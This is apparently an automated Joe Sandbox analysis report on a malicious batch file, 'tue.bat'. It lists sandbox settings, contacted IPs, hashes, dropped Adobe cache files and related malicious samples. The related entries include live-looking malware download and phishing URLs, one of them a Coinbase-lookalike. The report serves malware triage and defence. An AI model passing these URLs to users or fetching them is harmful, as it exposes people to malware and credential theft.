                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            96.7.168.138
                                            unknownUnited States
                                            262589INTERNEXABRASILOPERADORADETELECOMUNICACOESSABRfalse
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1542331
                                            Start date and time:2024-10-25 19:46:11 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 5m 12s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:20
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:tue.bat
                                            Detection:MAL
                                            Classification:mal48.winBAT@25/51@3/1
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 4
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Found application associated with file extension: .bat
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 184.28.88.176, 162.159.61.3, 172.64.41.3, 54.144.73.197, 34.193.227.236, 18.207.85.246, 107.22.247.231, 2.23.197.184, 217.20.57.18, 2.19.126.143, 2.19.126.149, 88.221.110.91, 2.16.100.168, 93.184.221.240
                                            • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, time.windows.com, a767.dspw65.akamai.net, acroipm2.adobe.com, wu.azureedge.net, dns.msftncsi.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, geo2.adobe.com
                                            • Execution Graph export aborted for target powershell.exe, PID 8088 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • VT rate limit hit for: tue.bat
                                            TimeTypeDescription
                                            13:47:21API Interceptor17x Sleep call for process: powershell.exe modified
                                            13:47:23API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            96.7.168.138https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0Get hashmaliciousUnknownBrowse
                                              bc3c228ad2c13f96cb14375c3860e802.pdfGet hashmaliciousHTMLPhisherBrowse
                                                Demande de proposition du CPE Les Coquins.pdfGet hashmaliciousUnknownBrowse
                                                  Airbornemx Benefits Enrollment.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    Scan_8346203.pdfGet hashmaliciousUnknownBrowse
                                                      Jwhite Pay Increase EFile997843.pdfGet hashmaliciousUnknownBrowse
                                                        roba.txtGet hashmaliciousMeterpreter, ReflectiveLoaderBrowse
                                                          Inv No.248730.xlsGet hashmaliciousUnknownBrowse
                                                            ddsfsfsa.pdfGet hashmaliciousUnknownBrowse
                                                              v2.0.pdfGet hashmaliciousUnknownBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com3coxOaV92n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 84.201.210.18
                                                                Qjq85KfhBC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 217.20.57.21
                                                                khwHsyfsJ1.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 84.201.210.34
                                                                xrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 217.20.57.18
                                                                AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 217.20.57.18
                                                                https://accesspage853.ubpages.com/4k5-ffdfgGet hashmaliciousUnknownBrowse
                                                                • 217.20.57.19
                                                                https://thegramp.nimbusweb.me/share/11336505/nigrk0yirmsg8qt4s4nmGet hashmaliciousHTMLPhisherBrowse
                                                                • 217.20.57.25
                                                                https://coinbase-team.net-s07.live/Zendesk/invite/ca2fd752-4355?rid=Ztd9NzCGet hashmaliciousUnknownBrowse
                                                                • 217.20.57.27
                                                                Gcca4WygdZ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 217.20.57.34
                                                                l4MyhIt40P.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 217.20.57.39
                                                                bg.microsoft.map.fastly.netQjq85KfhBC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 199.232.210.172
                                                                xrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 199.232.214.172
                                                                EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 199.232.214.172
                                                                X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 199.232.214.172
                                                                AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 199.232.210.172
                                                                3coxOaV92n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 199.232.210.172
                                                                e5mSvqt7Ho.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 199.232.210.172
                                                                96r3GgxntQ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 199.232.214.172
                                                                xrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 199.232.210.172
                                                                EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 199.232.214.172
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                INTERNEXABRASILOPERADORADETELECOMUNICACOESSABRhttps://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0Get hashmaliciousUnknownBrowse
                                                                • 96.7.168.138
                                                                bc3c228ad2c13f96cb14375c3860e802.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                • 96.7.168.138
                                                                Demande de proposition du CPE Les Coquins.pdfGet hashmaliciousUnknownBrowse
                                                                • 96.7.168.138
                                                                Airbornemx Benefits Enrollment.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                • 96.7.168.138
                                                                Scan_8346203.pdfGet hashmaliciousUnknownBrowse
                                                                • 96.7.168.138
                                                                Jwhite Pay Increase EFile997843.pdfGet hashmaliciousUnknownBrowse
                                                                • 96.7.168.138
                                                                roba.txtGet hashmaliciousMeterpreter, ReflectiveLoaderBrowse
                                                                • 96.7.168.138
                                                                Inv No.248730.xlsGet hashmaliciousUnknownBrowse
                                                                • 96.7.168.138
                                                                MDE_File_Sample_1a8e4ebbcc2e3f76efb2a55bb6179417263ebf3d.zipGet hashmaliciousUnknownBrowse
                                                                • 96.7.169.183
                                                                bin.armv7l.elfGet hashmaliciousMiraiBrowse
                                                                • 201.33.178.44
                                                                No context
                                                                No context
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):300
                                                                Entropy (8bit):5.276963771620009
                                                                Encrypted:false
                                                                SSDEEP:6:JBLBVq2PcNwi2nKuAl9OmbnIFUt8+BLfgZmw++BLfIkwOcNwi2nKuAl9OmbjLJ:JBXvLZHAahFUt8+Bc/++Bc54ZHAaSJ
                                                                MD5:B9E4F7E86C422F8BA94790365A86B2A3
                                                                SHA1:BA941F8360A6703C686A6A7443D97691FF867742
                                                                SHA-256:07D7C7D17D76A829E0F6F9AB7F62E41C21D664CCD08BD684D3BF3F7101206369
                                                                SHA-512:D5E46FC091ADE1DBCAD99A49604CEAC45F40088F4A7CB8988AA44E64D804F2839F92A293FFE9AB2790D6FEEFCB77D82CD71CE96024376A44B43C84566A0D9A98
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:2024/10/25-13:47:15.887 1d50 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/25-13:47:15.889 1d50 Recovering log #3.2024/10/25-13:47:15.889 1d50 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):300
                                                                Entropy (8bit):5.276963771620009
                                                                Encrypted:false
                                                                SSDEEP:6:JBLBVq2PcNwi2nKuAl9OmbnIFUt8+BLfgZmw++BLfIkwOcNwi2nKuAl9OmbjLJ:JBXvLZHAahFUt8+Bc/++Bc54ZHAaSJ
                                                                MD5:B9E4F7E86C422F8BA94790365A86B2A3
                                                                SHA1:BA941F8360A6703C686A6A7443D97691FF867742
                                                                SHA-256:07D7C7D17D76A829E0F6F9AB7F62E41C21D664CCD08BD684D3BF3F7101206369
                                                                SHA-512:D5E46FC091ADE1DBCAD99A49604CEAC45F40088F4A7CB8988AA44E64D804F2839F92A293FFE9AB2790D6FEEFCB77D82CD71CE96024376A44B43C84566A0D9A98
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:2024/10/25-13:47:15.887 1d50 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/25-13:47:15.889 1d50 Recovering log #3.2024/10/25-13:47:15.889 1d50 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):344
                                                                Entropy (8bit):5.2232533139033235
                                                                Encrypted:false
                                                                SSDEEP:6:JpetOq2PcNwi2nKuAl9Ombzo2jMGIFUt8+psZJZZmw++psZJzkwOcNwi2nKuAl97:JiOvLZHAa8uFUt8+iZT/++iZJ54ZHAaU
                                                                MD5:10875990F2D59ECE9DE1D80F0C12218F
                                                                SHA1:B358BB17408BF3621449DAC0135FC63189DEFA50
                                                                SHA-256:C5307B4FF300113B9E1DCEE43E70DDA432F765FDAF2515B3F25898ADF3C455E9
                                                                SHA-512:5DB9146D2882971FDEDEB449CE119BBDBB7BBA4A57D46D05C17BEDCF896A54E48AEFDCC8306F840F53682FA76DA05CBA50538C440909906C0792E363C70AC7E2
                                                                Malicious:false
                                                                Preview:2024/10/25-13:47:16.116 1e84 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/25-13:47:16.118 1e84 Recovering log #3.2024/10/25-13:47:16.118 1e84 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):344
                                                                Entropy (8bit):5.2232533139033235
                                                                Encrypted:false
                                                                SSDEEP:6:JpetOq2PcNwi2nKuAl9Ombzo2jMGIFUt8+psZJZZmw++psZJzkwOcNwi2nKuAl97:JiOvLZHAa8uFUt8+iZT/++iZJ54ZHAaU
                                                                MD5:10875990F2D59ECE9DE1D80F0C12218F
                                                                SHA1:B358BB17408BF3621449DAC0135FC63189DEFA50
                                                                SHA-256:C5307B4FF300113B9E1DCEE43E70DDA432F765FDAF2515B3F25898ADF3C455E9
                                                                SHA-512:5DB9146D2882971FDEDEB449CE119BBDBB7BBA4A57D46D05C17BEDCF896A54E48AEFDCC8306F840F53682FA76DA05CBA50538C440909906C0792E363C70AC7E2
                                                                Malicious:false
                                                                Preview:2024/10/25-13:47:16.116 1e84 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/25-13:47:16.118 1e84 Recovering log #3.2024/10/25-13:47:16.118 1e84 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:JSON data
                                                                Category:modified
                                                                Size (bytes):475
                                                                Entropy (8bit):4.9634035746652865
                                                                Encrypted:false
                                                                SSDEEP:12:YH/um3RA8sqdZCsBdOg2HNAAcaq3QYiubSpDyP7E4T3y:Y2sRdsOdMHC3QYhbSpDa7nby
                                                                MD5:9385A9DC297B670981112825EAAC324D
                                                                SHA1:F879B0EE83FA758E5703A1F0217C7993182EFFB3
                                                                SHA-256:4B4124BACCECF618A06793933128B86B05F19196E153743EC03CC45E940B0B6C
                                                                SHA-512:B7FE5930C985D6DDBA6A454B5B2A01679AAC4E7C430FC06059A8AAE88331722FEF3375DC4620A59B183F563417D9E29678B4207A7339A29E3A0900846247473C
                                                                Malicious:false
                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13374438447004837","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":224199},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):475
                                                                Entropy (8bit):4.969814904260269
                                                                Encrypted:false
                                                                SSDEEP:12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby
                                                                MD5:7BE9C8316EB1B7252CB363207744A145
                                                                SHA1:57861355BE6541501AED40F896891579DCF473BF
                                                                SHA-256:B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D
                                                                SHA-512:2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB
                                                                Malicious:false
                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341052428587673","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146366},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):475
                                                                Entropy (8bit):4.969814904260269
                                                                Encrypted:false
                                                                SSDEEP:12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby
                                                                MD5:7BE9C8316EB1B7252CB363207744A145
                                                                SHA1:57861355BE6541501AED40F896891579DCF473BF
                                                                SHA-256:B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D
                                                                SHA-512:2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB
                                                                Malicious:false
                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341052428587673","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146366},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):475
                                                                Entropy (8bit):4.969814904260269
                                                                Encrypted:false
                                                                SSDEEP:12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby
                                                                MD5:7BE9C8316EB1B7252CB363207744A145
                                                                SHA1:57861355BE6541501AED40F896891579DCF473BF
                                                                SHA-256:B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D
                                                                SHA-512:2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB
                                                                Malicious:false
                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341052428587673","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146366},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):4099
                                                                Entropy (8bit):5.2349778700515825
                                                                Encrypted:false
                                                                SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtP0Rp0B8VrY:CwNw1GHqPySfkcigoO3h28ytP0Rp48VM
                                                                MD5:7075193E3760079CEF1495EBF48CEDFD
                                                                SHA1:F5C797D427E4BF5029476A1B2A9FB9C1A3D6D51F
                                                                SHA-256:36116224C241C772A4A32FE5BC918F1E7E020C464B35A7FB8E5A2F7E499ECBD8
                                                                SHA-512:9A6477D899DFB5738B846F96B7DD933A7BA84913BA57198034BE37F12BFC51EB9AED1FA398FD164E534244F3324AF8AFC98ABF33BF84129F610186AE95BCDA09
                                                                Malicious:false
                                                                Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):332
                                                                Entropy (8bit):5.242072941062988
                                                                Encrypted:false
                                                                SSDEEP:6:JpdRFZaq2PcNwi2nKuAl9OmbzNMxIFUt8+pdKZmw++pd2kwOcNwi2nKuAl9OmbzE:J9PavLZHAa8jFUt8+O/++i54ZHAa84J
                                                                MD5:45ED85CE769D7FA601B53925DEDABD4D
                                                                SHA1:3BFB2E16074705419A6E670370242BB965B299D1
                                                                SHA-256:DEDB09D7CD0BBDA248ED02C81D8BB77EE6346FFABD53C5AB9D4A737FF2B0567D
                                                                SHA-512:C34180C707A9F3C7244B2B5F4E2434160D1EB1C428DED29F260A985565FE44069B0AF37451BD66161B42A726A62893AE382E486362704FE4AB7B408F626D81D5
                                                                Malicious:false
                                                                Preview:2024/10/25-13:47:16.184 1e84 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/25-13:47:16.185 1e84 Recovering log #3.2024/10/25-13:47:16.185 1e84 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):332
                                                                Entropy (8bit):5.242072941062988
                                                                Encrypted:false
                                                                SSDEEP:6:JpdRFZaq2PcNwi2nKuAl9OmbzNMxIFUt8+pdKZmw++pd2kwOcNwi2nKuAl9OmbzE:J9PavLZHAa8jFUt8+O/++i54ZHAa84J
                                                                MD5:45ED85CE769D7FA601B53925DEDABD4D
                                                                SHA1:3BFB2E16074705419A6E670370242BB965B299D1
                                                                SHA-256:DEDB09D7CD0BBDA248ED02C81D8BB77EE6346FFABD53C5AB9D4A737FF2B0567D
                                                                SHA-512:C34180C707A9F3C7244B2B5F4E2434160D1EB1C428DED29F260A985565FE44069B0AF37451BD66161B42A726A62893AE382E486362704FE4AB7B408F626D81D5
                                                                Malicious:false
                                                                Preview:2024/10/25-13:47:16.184 1e84 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/25-13:47:16.185 1e84 Recovering log #3.2024/10/25-13:47:16.185 1e84 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                Category:dropped
                                                                Size (bytes):86016
                                                                Entropy (8bit):4.438773527194114
                                                                Encrypted:false
                                                                SSDEEP:384:yeaci5G7iBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1LurVgazUpUTTGt
                                                                MD5:CD9157D8AB89C64990E65E5C7344B0CA
                                                                SHA1:2BAE2E95B6384EC43120BE743C91B012E51E7814
                                                                SHA-256:B689F07A455F000CA736195EEBCC85E61B37A772C08668AFA61B3887F3D090AA
                                                                SHA-512:010F47ADAEE2F62560188C7D5DC3B84617EAF0F5F76CCABC73513BC9D8A1C2F7529F91A7E2348A10B3DB51EBBA40B0C4A3E78691BC5F5279F3B4FE09402A9133
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:SQLite Rollback Journal
                                                                Category:dropped
                                                                Size (bytes):8720
                                                                Entropy (8bit):3.769845198670187
                                                                Encrypted:false
                                                                SSDEEP:48:7MapA2ioyVXioyJoWoy1CABoy17KOioy1noy1AYoy1Wioy11ioyeioyBoy1noy16:7xpfuXVAdX2jijb9IVXEBodRBk6
                                                                MD5:998C0D6D600C53C7179BD9D052012C90
                                                                SHA1:4CBD68D3F5C751BCFE623DBA8AC213EAC1218857
                                                                SHA-256:B7CF70FD1A11BDB392DB152649CFDD1410ADB82F81A71601E99CCB2F24C549AC
                                                                SHA-512:106E947B192B970A6C49882AE42A4B8C985695BC972C90AF1527EABCA794974FB0A0762700EA63EDFD6F837192567470C357E0C59A647E8FB13E64E521D42ED0
                                                                Malicious:false
                                                                Preview:.... .c......4/................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:Certificate, Version=3
                                                                Category:dropped
                                                                Size (bytes):1391
                                                                Entropy (8bit):7.705940075877404
                                                                Encrypted:false
                                                                SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                Malicious:false
                                                                Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):192
                                                                Entropy (8bit):2.7686775296558497
                                                                Encrypted:false
                                                                SSDEEP:3:kkFklC2O3/tfllXlE/HT8k9SttNNX8RolJuRdxLlGB9lQRYwpDdt:kKb3eT80StTNMa8RdWBwRd
                                                                MD5:60F7DA51B3851937D42374BB82C4ED8B
                                                                SHA1:0C6E5890668D2549B9852607A2A99BD5C1D5D6B2
                                                                SHA-256:7D4E34D7DD0C10AC08D001C05CC0C2DA91E9EA338148C09B0379F426D035C123
                                                                SHA-512:540F8A40D239029EF35A489187F6EBBE5C0399EBF43781D9D2411D3EF31257E54817A75792587C179DD80207E84C4172066B824F1E56537C0E3B652E9BBC7B95
                                                                Malicious:false
                                                                Preview:p...... ........1S...'..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:PostScript document text
                                                                Category:dropped
                                                                Size (bytes):185099
                                                                Entropy (8bit):5.182478651346149
                                                                Encrypted:false
                                                                SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                Malicious:false
